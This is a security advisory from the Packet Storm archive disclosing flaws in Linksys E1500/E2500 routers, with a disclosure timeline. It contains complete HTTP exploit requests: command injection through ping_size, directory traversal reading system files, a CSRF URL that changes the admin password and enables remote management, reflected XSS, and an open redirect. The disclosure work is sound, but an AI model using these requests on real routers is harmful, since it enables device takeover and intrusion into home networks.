exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Linksys E1500 / E2500 CSRF / XSS / Command Execution / Traversal

Linksys E1500 / E2500 CSRF / XSS / Command Execution / Traversal
Posted Feb 5, 2013
Authored by Michael Messner

Linksys models E1500 and E2500 suffer from cross site request forgery, cross site scripting, OS command injection, and directory traversal vulnerabilities.

tags | exploit, vulnerability, xss, file inclusion, csrf
SHA-256 | 2190f55bd127ac7423c9c743f4167459612f148b992042f0bd75b4b858c6d942

Linksys E1500 / E2500 CSRF / XSS / Command Execution / Traversal

Change Mirror Download
Device Name: Linksys E1500 / E2500
Vendor: Linksys

============ Device Description: ============

The Linksys E1500 is a Wireless-N Router with SpeedBoost. It lets you access the Internet via a wireless connection or through one of its four switched ports. You can also use the Linksys E1500 to share resources, such as computers, printers and files.

The installation and use of the Linksys E1500 is easy with Cisco Connect, the software that is installed when you run the Setup CD. Likewise, advanced configuration of the Linksys E1500 is available through its web-based setup page.

Source: http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=...

============ Vulnerable Firmware Releases - e1500: ============

Firmware-Version: v1.0.00 - build 9 Feb. 17, 2011
Firmware-Version: v1.0.04 - build 2 Mär. 8, 2012
Firmware-Version: v1.0.05 - build 1 Aug. 23, 2012

============ Vulnerable Firmware Releases - e2500: ============

Firmware Version: v1.0.03 (only tested for known OS command injection)

Other versions may also be affected.

============ Shodan Torks ============

Shodan Search: linksys e1500
Shodan Search: linksys e2500

============ Vulnerability Overview: ============

* OS Command Injection / E1500 and E2500 v1.0.03

=> Parameter: ping_size=%26ping%20192%2e168%2e178%2e102%26

The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or upload and execute a backdoor to compromise the device.
You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.

Example Exploit:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Diagnostics.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 185
Connection: close

submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26ping%20192%2e168%2e178%2e102%26&ping_times=5&traceroute_ip=

Change the request methode from HTTP Post to HTTP GET makes the exploitation easier:

http://192.168.178.199/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip=

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-os-command-injection-1.0.05-rooted.png

* Directory traversal - tested on E1500:

=> parameter: next_page

Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device.

Request:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Wireless_Basic.asp
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version

Response:
HTTP/1.1 200 Ok
Server: httpd
Date: Thu, 01 Jan 1970 00:00:29 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html
Connection: close

Linux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-dir-traversal.png

* For changing the current password there is no request of the current password - tested on E1500

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

Example Request:
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/Management.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 311

submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management - tested on E1500:

http://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* Reflected Cross Site Scripting - tested on E1500

=> Parameter: wait_time=3'%3balert('pwnd')//

Injecting scripts into the parameter wait_time reveals that this parameter is not properly validated for malicious input.

Example Exploit:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Wireless_Basic.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 300

submit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-XSS.png

* Redirection - tested on E1500

=> Paramter: submit_button=http://www.pwnd.pwnd%0a

Injecting URLs into the parameter submit_button reveals that this parameter is not properly validated for malicious input.

Example Exploit:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Wireless_Basic.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 290

submit_button=http://www.pwnd.pwnd%0a&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3&guest_ssid=Cisco01589-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco01589&_wl0_nbw=20&_wl0_channel=0&closed_24g=0

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-redirect.png

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-004
Twitter: @s3cur1ty_de

============ Time Line: ============

October 2012 - discovered vulnerability
21.10.2012 - contacted Linksys with vulnerability details
23.10.2012 - Linksys requestet to check new firmware v1.0.05 build 1
27.10.2012 - Tested and verified all vulnerabilities in release v1.0.05 build 1
27.10.2012 - contacted Linksys with vulnerabilty details in release v1.0.05 build 1
29.10.2012 - Linksys responded with case number
13.11.2012 - /me requested update of the progress
15.11.2012 - Linksys sends Beta Agreement
16.11.2012 - Linksys sends the Beta Firmware for testing
16.11.2012 - tested Beta version
18.11.2012 - informed Linksys about the results
30.11.2012 - reported the same OS Command injection vulnerability in model E2500
10.12.2012 - /me requested update of the progress
23.12.2012 - Update to Linksys with directory traversal vulnerability
09.01.2013 - Case closed
05.02.2013 - public release

===================== Advisory end =====================
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close